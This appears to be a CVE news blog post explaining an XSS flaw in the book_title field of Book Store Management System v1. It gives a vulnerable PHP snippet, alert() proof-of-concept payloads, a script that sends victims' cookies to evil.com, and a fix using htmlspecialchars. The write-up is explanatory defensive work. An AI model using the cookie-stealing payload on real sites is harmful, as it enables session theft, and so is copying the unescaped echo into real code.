CVE CyberSecurity Database News

CVE-2022-45225 - Exploiting XSS in Book Store Management System v1. — A Deep Dive

Poster -

Cross-Site Scripting (XSS) is a classic web vulnerability that refuses to become irrelevant. In this post, we’ll analyze CVE-2022-45225, a nasty XSS bug in Book Store Management System v1.. We’ll go step by step through the vulnerable code, see how to trigger the issue, and end with actionable advice for developers who want to protect their apps.

What is Book Store Management System?

Book Store Management System (BSMS) v1. is a web-based PHP/MySQL application designed to help manage a bookstore’s inventory, transactions, and records. It is often used in small businesses or as a college project, making it a popular choice, especially among beginners.

CVE-2022-45225 was found in the book functionality, specifically at this URL

/bsms_ci/index.php/book

The problem? The application does not sanitize the book_title parameter properly. Instead of filtering or encoding user input, it just displays it right back on the page. This allows an attacker to inject arbitrary JavaScript code — classic XSS.

Let’s break it down in plain English.

Whenever a user adds or edits a book, the application collects the book title and saves/displays it. If you submit a book title with normal characters (like “Moby Dick”), everything’s fine. But if you sneak in some HTML or JS, the app will show it as real code — not just plain text.

Let’s look at a sample vulnerable code snippet

<!-- Vulnerable display (e.g. book_list.php) -->
<td><?php echo $_POST['book_title']; ?></td>

See the problem? No escaping, no stripping, no nothing. That means anything you put in book_title becomes part of the HTML.

Proof of Concept (PoC) Exploit

Let’s see how an attacker would exploit this issue.

Submit a new book with the following title

<script>alert('XSS by Attacker');</script>

2. Submitting the Request

You can exploit this bug in a few ways. Let’s assume you have access to the “Add Book” form.

You fill in the Title field with

<script>alert('You got XSSed!')</script>

3. Viewing the Result

When anyone (including an admin) views the book list page, the JavaScript pops an alert box. If an attacker is smarter, they might steal user cookies or perform actions on their behalf without their knowledge.

Screenshot Example: (imagine a book list with one “book” that pops an alert)

Vulnerable Parameter: book_title

- Path: /bsms_ci/index.php/book

Third-party _hunters_ could inject code like

<script>document.location='http://evil.com/?cookie='+document.cookie</script>;

References

- NVD Listing for CVE-2022-45225
- Exploit Detail on Exploit-DB
- Original GitHub Repository

How To Fix?

If you develop with PHP, never trust user input. You must escape output.

<td><?php echo htmlspecialchars($_POST['book_title'], ENT_QUOTES, 'UTF-8'); ?></td>

Or, better yet, sanitize input on the way in and escape it on display.

Conclusion

CVE-2022-45225 shows why even small, local apps are targets. A bug like this can give attackers total control, whether it’s pranks or full-blown attacks. If you build web tools, always validate and escape input. If you find a bug, patch it fast and tell your users.

Stay safe, and happy coding!

*Written for security-conscious developers and researchers.*

Timeline

Published on: 11/25/2022 20:15:00 UTC
Last modified on: 12/01/2022 17:54:00 UTC